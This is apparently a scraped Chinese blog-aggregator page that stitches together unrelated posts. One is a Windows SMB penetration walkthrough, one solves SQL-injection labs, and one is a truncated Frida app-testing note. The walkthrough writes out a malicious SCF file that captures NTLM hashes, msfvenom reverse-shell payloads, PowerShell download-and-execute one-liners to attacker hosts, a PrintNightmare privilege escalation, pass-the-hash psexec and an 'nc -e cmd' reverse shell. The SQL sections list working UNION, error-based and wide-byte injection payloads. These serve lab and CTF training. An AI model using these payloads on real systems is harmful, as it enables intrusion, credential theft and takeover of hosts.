精华内容
下载资源
问答
  • 冰河的渗透实战笔记-冰河.pdf

    千次下载 2021-05-18 11:29:38
    冰河整理的全网首个开源的以实战案例为背景的渗透实战笔记,全书共442页,共计37万字(不计空格)。整本书的内容涵盖:Kali基础、渗透工具、木马制作、钓鱼链接生成、爆破密码、内存溢出攻击、web渗透、数据提权、...
  • 网站渗透实战篇.全面解析漏洞,内富解压密码,请看说明
  • WEB渗透实战解析

    2018-01-30 19:04:05
    电子工业出版社的,对于新手有很大帮助,已经撸完!!
  • 一次渗透实战.pdf

    2019-08-14 11:39:36
    一次渗透实战教程,里面详细记载了渗透实战过程,通过漏洞概述、漏洞说明,是学员有清晰认识。
  • 网络安全之渗透实战学习

    万次阅读 多人点赞 2021-10-27 20:28:33
    前言 本次渗透以SMB共享之SCF文件攻击为突破点,利用...本次渗透过程从技术层面来说难度并不算很大,本文精华在于渗透过程中运用到了多个知识点,并对多种利用SMB攻击的方法作了总结,下面开始此次渗透实战之旅。 信

    前言

    本次渗透以SMB共享之SCF文件攻击为突破点,利用burp编码爆破Basic Authorization认证、smb连接的多种方法、windows用户的NTLM值破解方法、evil-winrm的运用、windows主机信息收集工具、msf运行powershell脚本、远程运行powershell脚本、PrintNightmare漏洞提权等多个知识点。

    本次渗透过程从技术层面来说难度并不算很大,本文精华在于渗透过程中运用到了多个知识点,并对多种利用SMB攻击的方法作了总结,下面开始此次渗透实战之旅。

    信息收集

    首先进行基本的端口扫描;

    image.png

    看到445端口,想到了smb的多种利用方法;看到5985,想到了可能要利用evil-winrm;然后在重点照顾下445端口;

    nmap -A --script smb-vuln* -p 445 10.10.11.106

    image.png

    并没有发现直接的突破口,那我们还是从web入手。

    smb匿名登录

    尝试一波smb匿名登录,看是否存在共享文件,可以作为突破的线索;

    常用命令总结如下:

    smbmap -H 10.10.11.106
    smbclient -N -L //10.10.11.106
    enum4linux -a 10.10.11.106

    image.png

    暂时没有发现。

    为了感谢广大读者伙伴的支持,准备了以下福利给到大家:
    【一>所有资源获取<一】
    1、200多本网络安全系列电子书(该有的都有了)
    2、全套工具包(最全中文版,想用哪个用哪个)
    3、100份src源码技术文档(项目学习不停,实践得真知)
    4、网络安全基础入门、Linux、web安全、攻防方面的视频(2021最新版)
    5、网络安全学习路线(告别不入流的学习)
    6、ctf夺旗赛解析(题目解析实战操作)

    burp编码爆破

    打开网页,弹出Basic Authorization认证

    image.png

    抓包进行爆破;

    image.png

    划红线的地方要设置3次,分别为:1、admin  2、:  3、 密码

    image.png

    用个弱口令字典,跑出结果了;

    image.png

    admin:admin

    SMB共享之SCF文件攻击

    登录后台,发现一个可上传文件的地方;

    image.png

    经过多次尝试,这里可利用SCF文件攻击进行渗透,下面介绍3种利用方法:

    通过 NTLM 捕获进行 SMB 攻击

    基本原理:SCF(Shell 命令文件)文件可用于执行一组有限的操作,一个 SCF 文件可以用来访问一个特定的 UNC 路径,允许渗透测试人员构建攻击。下面的代码可以被放置在一个文本文件,然后需要被植入到网络共享。

    [Shell]Command=2
    IconFile=\\10.10.16.4\share\hack.ico
    [Taskbar]
    Command=ToggleDesktop
    

    将hack.txt文件保存为SCF文件,在文件名前面添加@符号可以将hack.scf放在共享驱动器文件列表的顶部。(@hack.scf)并设置接收方法;

    Responder需要使用以下参数执行来捕获浏览共享的用户的哈希值。

    responder -wrf -I tun0

    当用户浏览共享时,将自动会从系统建立网络连接,连接到包含在SCF文件内的UNC路径。Windows将尝试使用用户名和密码对该共享进行身份验证。在验证过程中,随机的8字节质询密钥会从服务器发送到客户端,散列后的NTLM / LANMAN密码再次使用这个质询密钥进行加密。Responder将捕获NTLMv2哈希。

    image.png

    除了Responder,MSF也有一个模块,可以用来捕获来自SMB客户端的挑战 – 响应密码哈希。

    auxiliary/server/capture/smb

    image.png

    image.png

    上传之前的hack.scf来触发,就获取到了用户的NTLM值。

    直接获取shell

    利用MSF框架实现攻击。

    exploit/windows/smb/smb_relay
    set payload windows/meterpreter/reverse_tcp
    set LHOST 10.10.16.4
    set smbhost 192.168.0.100
    set srvport 8080
    exploit
    

    image.png

    上传之前的hack.scf来触发,但本次渗透中该方法实测失败了。

    上传payload获取shell

    本方法的主要优点是它不需要与用户有任何交互,并自动强制用户连接到共享,在这个过程中不存在NTLMv2哈希的协商过程。因此,也可以将此技术与SMB中继相结合,SMB中继将提供有效载荷,可以从访问该共享的每个用户检索Meterpreter Shell。

    MSFVenom可用于生成将在目标上执行的有效载荷:

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.171 LPORT=5555 -f exe > hack.exe
    

    利用Impacket中的smbrelayx 这个python脚本可以设置中继攻击并在当目标主机尝试连接SMB服务器时提供有效载荷。这将自动执行,因为SCF文件将强制每个用户使用他们自己的凭据连接到一个不存在的共享。

    ./smbrelayx.py -h Target-IP -e ./hack.exe

    同时利用MSF设置木马的回连端:

    exploit/multi/handler

    模块需要配置与生成的有效载荷相同的参数。

    set payload windows/meterpreter/reverse_tcp
    set LHOST 192.168.1.171
    set LPORT 5555
    exploit
    

    当用户浏览共享时,SMB服务器将接收到连接,并且将使用用户名和密码散列来与他的系统进行认证,并将有效载荷执行为可写共享。本次渗透中该方法实测失败。

    获取到NTLM值后,下一步尝试破解。

    LM NTLM NET-NTLM2破解

    Windows的系统密码hash默认情况下一般由两部分组成:第一部分是LM Hash,第二部分是NT Hash
    LM

    Windows Vista / Server 2008已经默认关闭,在老版本可以遇到,但根据windwos的向下兼容性,可以通过组策略启用它
    示例:299BD128C1101FD6
    hash破解:

    john --format=lm hash.txt
    hashcat -m 3000 -a 3 hash.txt
    

    NThash

    NTLM是现在Windows系统上存储密码的方式,可以通过转储SAM数据库或使用Mimikatz来获得。
    示例:B4B9B02E6F09A9BD760F388B67351E2B
    hash破解:

    john --format=nt hash.txt
    hashcat -m 1000 -a 3 hash.txt
    

    NTLMV1
    NTLM协议在服务器和客户端之间的质询/响应中使用NTHash,协议的v1同时使用NT和LM哈希,具体取决于配置和可用内容。
    示例:

    u4-netntlm::kNS:338d08f8e26de93300000000000000000000000000000000:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c
    

    hash破解:

    john --format=netntlm hash.txt
    hashcat -m 5500 -a 3 hash.txt
    

    NTLMV2
    这是NTLM协议的新版本和改进版本,这使其很难破解。该概念与NTLMv1相同,只是发送到服务器的算法和响应不同,从Windows 2000开始,在Windows中为默认值。
    示例:

    admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030
    

    hash破解:

    john --format=netntlmv2 hash.txt
    hashcat -m 5600 -a 3 hash.txt
    

    在本次渗透中用的是NTLMV2;

    hashcat -m 5600 -a 3 123.txt --wordlist top100.txt

    image.png

    john --format=netntlmv2 123.txt -w=top100.txt

    image.png

    成功得到用户名和密码:tony:liltony

    根据开放的445和5985端口,连接一波;

    尝试psexec连接失败;

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-pB7Ofv13-1635337682265)(https://upload-images.jianshu.io/upload_images/26472780-ac960ef4943dcd51.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)]

    evil-winrm -i 10.10.11.106 -u tony -p liltony

    image.png

    连接成功,下面就要开始想办法进行提权。

    smb带用户名密码登录

    利用得到的用户名和密码,再次尝试登录smb共享;

    image.png

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-WjhLPGxj-1635337682278)(https://upload-images.jianshu.io/upload_images/26472780-d7ed45ca1d8f9f6a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)]

    image

    image.png

    image.png

    提权

    主机信息收集

    尝试使用命令,结果没有权限执行;

    image.png

    那就用脚本来跑,常用的是winPEASx64.exe或者winPEAS.bat,这里有个小坑,程序运行时要加反斜杠;

    image.png

    image.png

    结果很多,最后发现print spooler service 服务;

    image.png

    利用最近的WINDOWS PRINT SPOOLER远程代码执行漏洞(CVE-2021-1675)来提权。

    https://github.com/calebstewart/CVE-2021-1675

    测试发现直接导入powershell脚本会报错;

    下面分别采用2种方法;

    msf加载powershell

    生成个木马

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.4 LPORT=7777 -f exe > hack.exe
    

    接收反弹;

    image.png

    利用evil-winrm上传hack.exe,运行;

    image.png

    程序会报错且会话中断,迁移下进程,再次尝试;

    image.png

    需要事先上传ps1脚本到主机对应的位置,否则找不到脚本;!image.png

    这次就成功执行了脚本,添加了一个新的用户且有administrator权限。还可以尝试一波远程运行ps脚本。

    远程运行powershell脚本

    远程下载文件到本地并执行

    cmd.exe /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://127.0.0.1:8089','notepad.exe');start-process notepad.exe
    

    远程执行ps1脚本

    powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://bit.ly/1kEgbuH')"
    

    自己搭建个http服务器

    image.png

    远程运行ps脚本;

    IEX(New-Object Net.Webclient).downloadstring('http://10.10.16.4:8000/CVE-2021-1675.ps1')
    Invoke-Nightmare -NewUser "hack123" -NewPassword "hack123"
    

    image.png

    image.png

    抓取密码试试;

    ./mimikatz.exe privilege::debug "sekurlsa::logonpasswords" exit

    image.png

    至此,成功拿下了该主机,下面彩蛋环节,总结下其他几种smb常见的攻击方法。

    smb攻击方式

    Windows SMB 的版本
    CIFS:SMB 的旧版本,于 1996 年包含在 Microsoft Windows NT 4.0 中。

    SMB 1.0 / SMB1:在 Windows 2000、Windows XP、Windows Server 2003 和 Windows Server 2003 R2 中使用的版本。

    SMB 2.0 / SMB2:此版本用于 Windows Vista 和 Windows Server 2008。

    SMB 2.1 / SMB2.1:此版本用于 Windows 7 和 Windows Server 2008 R2。

    SMB 3.0 / SMB3:此版本用于 Windows 8 和 Windows Server 2012。

    SMB 3.02 / SMB3:此版本用于 Windows 8.1 和 Windows Server 2012 R2。

    SMB 3.1:此版本用于 Windows Server 2016 和 Windows 10。

    目前,SMB 的最新版本是 SMB 3.1.1,它是在 Windows 10 和 Windows Server 2016 中引入的。该版本除了支持 SMB3 中添加的 AES 128 CCM 加密外,还支持 AES 128 GCM 加密,并使用SHA-512 哈希。当连接到使用 SMB 2.x 及更高版本的客户端时,SMB 3.1.1 还强制要求进行安全协商。

    永恒之蓝

    我们运行以下MSF模块,该模块将直接利用目标机器。

    use exploit/windows/smb/ms17_010_eternalblue
    msf exploit(ms17_010_eternalblue) > set rhost 192.168.1.101
    msf exploit(ms17_010_eternalblue) > exploit
    

    暴力破解

    hydra -L user.txt -P pass.txt 192.168.1.101 smb
    -L --> 表示用户名列表
    -P --> 表示密码
    

    如果破解成功,就可以枚举系统上的用户;

    use auxiliary/scanner/smb/smb_enumusers
    msf auxiliary(smb_enumusers) > set rhosts 192.168.1.101
    msf auxiliary(smb_enumusers) > set smbuser raj
    msf auxiliary(smb_enumusers) > set smbpass 123
    msf auxiliary(smb_enumusers) > exploit
    

    实测一下;

    image.png

    image.png

    PSexec 连接SMB

    可以用msf里的模块;

    use exploit/windows/smb/psexec
    msf exploit windows/smb/psexec) > set rhost 192.168.1.101
    msf exploit(windows/smb/psexec) > set smbuser raj
    msf exploit(windows/smb/psexec) > set smbpass 123
    msf exploit(windows/smb/psexec) > exploit
    

    因为本次渗透无法成功,补了之前的一张图;

    image.png

    还可以用Impacket中的psexec.py
    #用明文密码连接

    ./psexec.py xie/administrator:密码@192.168.10.131

    #用哈希值连接

    ./psexec.py xie/administrator@192.168.10.131 -hashes AADA8EDA23213C025AE50F5CD5697D9F:6542D35ED5FF6AE5E75B875068C5D3BC
    

    还可以直接用psexec.exe程序;

    image.png

    Rundll32 One-liner

    通过Metasploit的SMB Delivery启动Rundll32攻击

    Metasploit还包含了生成恶意dll文件的“SMB Delivery”模块。该模块通过SMB服务器提供payload,并提供检索和执行生成payload的命令。目前支持DLL和Powershell。

    use exploit/windows/smb/smb_delivery
    msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.109
    msf exploit(windows/smb/smb_delivery) > exploit
    

    这将生成恶意 DLL 文件的链接,现在将此链接发送到你的目标并等待他的操作。

    image.png

    一旦受害者在运行提示符或命令提示符内运行恶意代码,我们就会在 Metasploit 上获得一个 Meterpreter 会话。

    SMB DOS 攻击

    SMB Dos 攻击是我们在 Metasploit 框架中拥有的另一种最优秀的方法。

    该模块利用 Windows 7 和 Windows Server 2008 R2 上的 Microsoft Windows SMB 客户端中的拒绝服务缺陷。要触发此错误,请将此模块作为服务运行,并强制易受攻击的客户端作为 SMB 服务器访问此系统的 IP。如果目标使用 Internet Explorer 或 Word 文档,则可以通过将 UNC 路径 (\HOST\share\something) 嵌入到网页中来实现。

    use auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop
    msf auxiliary(ms10_006_negotiate_response_loop) > set srvhost 192.168.1.106
    msf auxiliary(ms10_006_negotiate_response_loop) > exploit
    

    远程文件传输和运行

    文件传输用法如下:

    利用著名的impacket包里的smbserver.py,进行文件传输。
    目录根据你自己定smbserver.py share ‘/root/exp’

    image.png

    然后在监听的shell里copy CEH.kdbx \10.10.14.57\Share,成功收到文件

    image.png

    还可以远程运行程序;

    开启impacket里的smbsever服务,把ms15-051x64和nc64.exe放到我指定的共享文件,

    python smbserver.py Share '/root/htb/bastard'

    在shell里执行反弹;

    \\10.10.14.57\share\ms15-051x64.exe "\\10.10.14.57\share\nc64.exe -e cmd 10.10.14.57 443"

    另外本机监听443.收到,搞定

    image.png

    总结

    对于SCF文件攻击,我们也可以通过下列方法来防止这种攻击的发生:
    1、使用Kerbeors认证或SMB签名;

    2、禁用共享文件给未认证用户所提供的写入权限;

    3、确保使用的是NTLMv2密码并增加口令的复杂程度。

    展开全文
  • 安鸾渗透实战平台-sql注入篇

    千次阅读 2021-01-04 09:53:55
    安鸾渗透实战平台是一个在线的靶场平台,需要通过一些列手段找到flag提交 文章目录sql注入篇SQL字符型注入(1-2)一、需识别mysql默认的information库二、内部结构1.schemata表内容2.tables表内容3.columns表内容4....

    sql注入篇

    安鸾渗透实战平台是一个在线的靶场平台,需要通过一些列手段找到flag提交



    SQL字符型注入(1-2)

    开始忘记截图了,只好给大家直接写一下payload了


    提示:仅适合参考

    一、需识别mysql默认的information库

    mysql 5.0版本以上会有一个默认的information_schema库,里面有三个重要的表,分别是information_schema.schemata、information_schema.tables以及information_schema.columns,他们分别记录了数据库内的所有库名、表名以及字段名

    在这里插入图片描述

    二、内部结构

    1.schemata表内容

    此表内只有一个重要数据字段,那就是schema_name,这个记录了数据库内全部的库名称,而且是不重复的那种
    在这里插入图片描述

    2.tables表内容

    此表记录了数据库内的库名、表名,字段分别是table_schema 以及 table_name ,至于为啥不用他来直接检索数据库库名,相信大家不难看到,这里面的内容是重复的
    在这里插入图片描述

    3.columns表内容

    此表关键数据为table_schema、table_name以及column_name 分别记录了数据库库名、表名、字段名,当然也是一一对应的
    在这里插入图片描述

    4.解题思路

    好了,简单的介绍了一下数据库结构,接下来说一下解题思路。由于忘记截图导致只能口述一下。
    在这里插入图片描述
    由上图可以看到,第一个是数字型注入,第二个是字符型注入,所以直接输入一个探测符号–单引号,发现数据库报错,根据报错信息可以得知这个数据库大概率是Mysql的;
    第二步,使用Order by 语句探测字段的个数,得到字段数为3个(二分法不细讲了,不明白的私信我),并且知道了都有哪些字段会显示在浏览器里,payload为

    order by 3 -- -
    -1 union select 1,2,3 -- -
    
    	第三步,使用联合查询查询他的库名
    
     -1 union select 1,group_concat(schema_name) ,3 from information_schema.schemata -- -
    
    	第四步,根据得到的库名“dwvs”继续深入查询他的表,发现可疑表“flag”
    
    -1 union select 1,group_concat(table_name) ,3 from information_schema.tables where table_schema="dwvs" -- -
    
    	第五步,根据得到的flag表去查询他的字段
    
     -1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name="flag" -- -
    
    	第六步,得到flag字段内容
    
    -1 union select 1,flag,3 from flag -- -
    

    第二题和第一个解题思路是一样的,只是多了个单引号


    SQL搜索型注入

    首先先注册一个账户然后登陆即可
    在这里插入图片描述
    第一步,猜测字段长度

    ' order by 7 -- -
    

    在这里插入图片描述
    第二步,猜测显示字段号

    -1' union select 1,2,3,4,5,6,7 -- -
    

    在这里插入图片描述
    第三步,得到库名

    在这里插入代码片
    

    在这里插入图片描述
    第四步,得到表名

      -1' union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema="whalwl" -- -
    

    在这里插入图片描述
    第五步,得到字段名

     -1' union select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_name="this_flag" -- -
    

    在这里插入图片描述
    第六步,得到flag

    -1'  union select 1,flag,3,4,5,6,7 from this_flag-- -
    

    在这里插入图片描述


    # SQL搜索型注入 随便点一个链接,不要碰搜索框和留言板,那里注入我试了,手工挖是真的坑,要找就找简单的点 [添加链接描述](http://whalwl.host:8034/show.php?id=33%20order%20by%2016%20--%20-) 第一步,找到字段的个数,这里找到字段的个数为15 ```sql order by 15 -- - ```

    在这里插入图片描述
    第二步,找到有哪些字段会被显示,经过测试,得到3,11,12字段会被显示

    -33 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 -- -
    

    在这里插入图片描述
    第三步,得到库名

    union select 1,2,3,4,5,6,7,8,9,10,11,group_concat(schema_name),13,14,15 from information_schema.schemata-- -
    

    在这里插入图片描述
    第四步,爆表

    union select 1,2,3,4,5,6,7,8,9,10,11,group_concat(table_name),13,14,15 from information_schema.tables where table_schema="cms" -- -
       
    

    在这里插入图片描述
    第五步,爆字段

    union select 1,2,3,4,5,6,7,8,9,10,11,group_concat(column_name),13,14,15 from information_schema.columns where table_name="this_is_flag" -- -
    

    在这里插入图片描述
    第六步,爆数据

    union select 1,2,3,4,5,6,7,8,9,10,11,flag,13,14,15 from this_is_flag -- -
    

    在这里插入图片描述
    flag{16aeb3e6d73689bf456c5c50f2d04b84}


    # COOKIE注入 这个我手工是真没挖出来,按照常规的打发,输入代码根本不好使,不知道是哪里出了问题,我的cookie注入就没好使过
    javascript:alert(document.cookie="id="+escape("1 and 1=1"))
    

    在这里插入图片描述
    尴尬极了,不知道人家咋手工出来的,啥也不说了,不能重复造车轮子,直接sqlmap弄他
    在这里插入图片描述
    flag{d523990a3ff51ff035d5cf378f175e88}


    # xff注入 访问页面直接拦截数据包,在Host头后面加入X-Forwarded-For:127.0.0.1*

    在这里插入图片描述

    sqlmap -r /root/桌面/2.txt -D "xff" -T "this_flag" -C "flag" --dumps
    

    在这里插入图片描述
    flag{00b116d12ab1d53490e6b685cc7862fc}


    sql搜索型盲注

    搜索框输入排序语句大于6就会无内容,所以判断字段数为6
    第一步,判断字段个数

    1' order by 5 -- -
    

    在这里插入图片描述
    第二步,判断字段的显示

    -1' union select 1,2,3,4,5 -- -
    

    在这里插入图片描述
    第三步,判断库名

     -1' union select 1,group_concat(schema_name),3,4,5 from information_schema.schemata-- -
    
    

    在这里插入图片描述
    第四步,爆表

       -1' union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema="dwvs" -- --
    
    

    在这里插入图片描述
    第五步,爆字段

          -1' union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name="flag" -- -
    

    在这里插入图片描述
    第七步,爆数据

        -1' union select 1,flag,3,4,5 from flag -- -
    

    在这里插入图片描述
    flag{8bce2844bc098845261fad79a3a56215}

    POST盲注/万能密码

    登录框处存在盲注,这里面测试一下是确实有时间盲注的
    在这里插入图片描述
    通过 and sleep(2) 时间函数发现服务器响应时间延长两秒
    在这里插入图片描述
    在这里插入图片描述
    密码处发现奇葩现象

    ' order by 5 -- -
    

    通过排序得到字段数,在用户名或密码处都可以,输入以上payload发现若是字段数不正确则会出现mysql error字眼,通过此字样发现输入正确的字段数才会无明显回显

    -qwefg ' union select 1,2,3,4,5 -- -
    

    在这里插入图片描述
    发送数据请求后发现貌似登录成功了
    在这里插入图片描述
    经过测试,那个数字2确实是显示的字段,只是麻烦的就是得一直退出登录然后反复的在密码栏输入payload

    尝试爆数据库版本

    -1111' union select 1,version(),3,4,5 -- -
    

    在这里插入图片描述
    爆库

    -1111' union select 1,group_concat(schema_name),3,4,5 from information_schema.schemata -- -
    

    在这里插入图片描述
    爆表

    -1111' union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema="dwvs" -- -
    

    在这里插入图片描述
    爆字段

    -1111' union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name="flag" -- -
    

    在这里插入图片描述
    爆内容

    -1111' union select 1,flag,3,4,5 from flag -- -
    

    在这里插入图片描述
    flag{f99c688f101bb53fdbf178ad0889182e}

    报错型注入insert

    注册登录后,在编辑选项修改个人信息
    在这里插入图片描述

    vlan911'  and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- -
    

    好吧,本来想用order by,结果发现只给一个字段都不行,猜测不出来字段数量,只能按照人家啊报错注入来了,这里使用updatexml()函数来进行爆破
    在这里插入图片描述
    在这里插入图片描述
    偷个懒,直接用了这里,接下来爆表

    vlan911'  and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="dwvs"),0x7e),1) -- -
    

    在这里插入图片描述
    爆字段,说实话,我没找到flag表在哪,我承认了,我输了,偷窥了一眼别人的

    vlan911' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="dwvs" and  table_name="flag"),0x7e),1) -- -
    

    在这里插入图片描述

    vlan911' and updatexml(1,concat(0x7e,(select group_concat(flag) from dwvs.flag),0x7e),1) # 
    

    在这里插入图片描述
    flag{690997feb8fc9341}

    宽字符注入

    宽字节注入,大家都知道%df’ 被PHP转义(开启GPC、用addslashes函数,或者icov等),单引号被加上反斜杠\,变成了 %df\’,其中\的十六进制是 %5C ,那么现在 %df\’ =%df%5c%27,如果程序的默认字符集是GBK等宽字节字符集,则MYSQL用GBK的编码时,会认为 %df%5c 是一个宽字符,也就是縗’,也就是说:%df\’ = %df%5c%27=縗’,有了单引号就好注入了
    在这里插入图片描述

    %df' order by 5 %23
    

    这里发现%df’可以成功绕过反斜杠,但是注释符不能直接用“#”或者“-- -”,需要转换成url格式,由于井号就一个“%23”所以在这里就用这个了
    在这里插入图片描述
    这里就能看到,是5个字段,咳咳,所以下面就好办了

    -1%df' union select 1,2,3,4,5 %23
    

    在这里插入图片描述
    爆库,直接偷偷懒

    -1%df' union select 1,database(),3,4,5 %23
    

    在这里插入图片描述
    爆表,由于单引号会被转义,咱们就规避一下,转换一下格式就好,把库名转换成十六进制就行(推荐小葵)

    -1%df' union select 1,database(),group_concat(table_name),4,5 from information_schema.tables where table_schema= 0x6B7A66 %23
    

    在这里插入图片描述
    爆字段

    -1%df' union select 1,database(),group_concat(column_name),4,5 from information_schema.columns where table_schema= 0x6B7A66 and table_name=0x746869735F666C6167 %23
    

    在这里插入图片描述
    报内容

    -1%df' union select 1,database(),flag,4,5 from this_flag %23
    

    在这里插入图片描述
    flag{573ce050c8dcdf3f216bf1485480c1ff}

    SOAP协议注入

    访问http://www.whalwl.host:8018/ws_soap.php?wsdl
    在这里插入图片描述
    对于应用程序开发来说,使程序之间进行因特网通信是很重要的。目前的应用程序通过使用远程过程调用(RPC)在诸如 DCOM 与 CORBA 等对象之间进行通信,但是 HTTP 不是为此设计的。RPC 会产生兼容性以及安全问题;防火墙和代理服务器通常会阻止此类流量。通过 HTTP 在应用程序间通信是更好的方法,因为 HTTP 得到了所有的因特网浏览器及服务器的支持。SOAP 就是被创造出来完成这个任务的。SOAP 提供了一种标准的方法,使得运行在不同的操作系统并使用不同的技术和编程语言的应用程序可以互相进行通信。
    soap也也大量应用于手机app与服务器通信和数据传输中
    (上面的这段抄的人家的https://blog.csdn.net/niexinming 感谢niexinming大佬)

    这个大佬估计可以手挖,但是我确实没手挖出来,直接把url扔AWVS里了
    在这里插入图片描述
    把request粘贴走,而后在title处加入标记直接放sqlmap跑
    在这里插入图片描述
    flag{ba8b6a6f6e38ed7e173d03504132dbe8}

    站挂了,提交不上去了,暂时先到这

    提示:仅适合参考

    总结

    提示:

    展开全文
  • 安鸾渗透实战平台|SQL数字型GET注入02 一、渗透靶场地址 http://whalwl.work:8034/ 二、渗透实战 1.开始以为渗透后台,避免采坑 admin' or 1=1 # 123 直接就进入后台啦 2.实战开始,在搜索中输入1',报错 1' 3....

    安鸾渗透实战平台|SQL数字型GET注入02

    一、渗透靶场地址

    http://whalwl.work:8034/

    二、渗透实战

    1.开始以为渗透后台,避免采坑

    admin' or 1=1 #
    123
    

    在这里插入图片描述
    直接就进入后台啦
    在这里插入图片描述
    2.实战开始,在搜索中输入1',报错

    1'
    

    在这里插入图片描述

    在这里插入图片描述
    3.当我们在后面加个#时,正常回显

    1'#
    

    在这里插入图片描述
    4.判断orand,空格等号是否被过滤

    1' or 1=1#
    

    在这里插入图片描述

    1' and 1=1#
    

    在这里插入图片描述
    根据报错信息,发现过滤了等号,使用like绕过

    1' or 1 like 1#
    

    在这里插入图片描述

    1' and 1 like 1#
    

    在这里插入图片描述
    6.发现or,and,空格没有被绕过,接下来判断列

    1' order by 1,2,3,4#
    

    在这里插入图片描述
    7.经过大量的测试,发现14列,遇到列比较多的情况时,使用二分法,比较快。(二分法:猜测有50列,使用25进行测)

    1' order by 14,15#
    

    在这里插入图片描述
    8.接下来,判断显位点

    -1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14#
    

    在这里插入图片描述
    9.通过回显可以判断出,显位点是3,9这个两个位置

    -1' union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14#
    

    可以看到版本号的值
    在这里插入图片描述

    10.爆破数据库

    -1' union select 1,2,3,4,5,6, 7,8,group_concat(schema_name) from information_schema.schemata,10,11,12,13,14#
    

    报错,觉得长度被截断,不能执行SQL注入
    在这里插入图片描述
    前面不是有两个注入点,那我们就将这条注入语句进行拆分

    -1' union select 1,2,group_concat(schema_name),4,5,6, 7,8,from information_schema.schemata,10,11,12,13,14#
    

    依然报错
    在这里插入图片描述

    上面的方法测试啦,也不行,就尝试注入点3和末尾拼接语句

    -1' union select 1,2,group_concat(schema_name),4,5,6, 7,8,9,10,11,12,13,14 from information_schema.schemata#
    

    在这里插入图片描述
    遇到了新的报错Illegal mix of collations for operation 'UNION',它的意思是指操作联合的非法排序规则
    在这里插入图片描述

    解决办法一:
    使用十六进制的方式读取

    -1' union select 1,2,group_concat(hex(schema_name)),4,5,6, 7,8,9,10,11,12,13,14 from information_schema.schemata#
    

    在这里插入图片描述
    然后利用十六进制转字符串,就可以得到数据库
    解密网站:http://tool.haooyou.com/code?group=convert&type=hexToStr&charset=UTF-8
    在这里插入图片描述

    解决办法二:
    使用binary方式解决字符集的问题

    -1' union select 1,2,binary(group_concat(schema_name)),4,5,6, 7,8,9,10,11,12,13,14 from information_schema.schemata#
    

    在这里插入图片描述
    使用binary的方式,直接的到数据库的名称,成功爆破数据库

    information_schema,cms,mysql,performance_schema 
    

    11.爆表

    -1' union select 1,2,binary(group_concat(table_name)),4,5,6, 7,8,9,10,11,12,13,14 from information_schema.tables where table_schema like 'cms'#
    

    在这里插入图片描述
    可以看到有个表名为this_is_flag
    12.爆字段名

    -1' union select 1,2,binary(group_concat(column_name)),4,5,6, 7,8,9,10,11,12,13,14 from information_schema.columns where table_schema like 'cms' and table_name like 'this_is_flag'#
    

    在这里插入图片描述
    得到两个字段名id,flag
    13.爆破字段的内容

    -1' union select 1,2,binary(group_concat(flag)),4,5,6, 7,8,9,10,11,12,13,14 from this_is_flag#
    

    在这里插入图片描述
    成功得到flag

    三、知识点总结

    1.本道题目比较新颖,在使用SQL注入的过程中,第一次遇到片接的情况,并且执行sql语句使用的是注入位置是注入点 + 字段后的内容

    2.binary函数解决字符集的问题

    四、参考链接

    https://blog.csdn.net/aa18390583207/article/details/103378175

    展开全文
  • 包含一下几个方面 1.漏洞搜索与利用 2.后台Getshell上传技巧 3.系统信息收集 4.主机密码收集 5.内网--内网信息收集 ...6.内网攻击姿势--信息泄露 ...11.域渗透-域成员信息收集 12.域管理密码获取。
  • 一次App 渗透实战

    2020-12-23 22:16:04
    玄魂工作室秘书 玄魂工作室 前天郑重声明:昨天这篇文章对外发布的时候,很多人直接找到我,说泄露了小米商城的的内部bug。吓得我赶紧撤回了文章。现在解释一下,文中确实有捕获小米的流量,那是因为我们的测试机为...

    玄魂工作室秘书 玄魂工作室 前天

    郑重声明:昨天这篇文章对外发布的时候,很多人直接找到我,说泄露了小米商城的的内部bug。吓得我赶紧撤回了文章。现在解释一下,文中确实有捕获小米的流量,那是因为我们的测试机为小米手机,并非测试的是小米商城。作者也非小米员工。为了表示歉意,本篇文章发放红包,领取红包方法,见文末。

    -----------------------------------

    说明: 本文来自 "玄说安全” 内部成员

    -----------------------------------------------------

    最近对自家公司的业务app做了自查测试,发现的一个问题,以及测试过程所遇到的坑,记录下来。

    1,首先在手机wifi里设置代理,将手机的流量都导入到导入到电脑的burp里。

    2,先抓取涉及到目标app的流量,不出意外,流量全部做了加密(要都是明文,也就没有记录的意义了^_^).

    3,一看加密流量,就很自然的接上frida,查看加密的流量内容,并尝试使用burp的插件,解密流量,尝试修改参数,再进行加密,再次提交。

    启动frida服务,并设置与电脑联调。

    抓取加密流量

    查看对应的加密流量里解密后的信息

    4,因为惯性思维,导致在这里遇到了此次测试最大的坑!想当然的以为所有的加密流量都是由app封装的,逆向了apk之后,查找所有涉及到加解密的函数,一个一个hook查看,发现这个app,一部分流量是经过了公司内部的加解密服务,可是有一部分流量,无法hook到。

    无法hook到的加密流量(可能老司机们一眼就能看出来问题所在,可我这个小白,在这个困住了好久 --!)

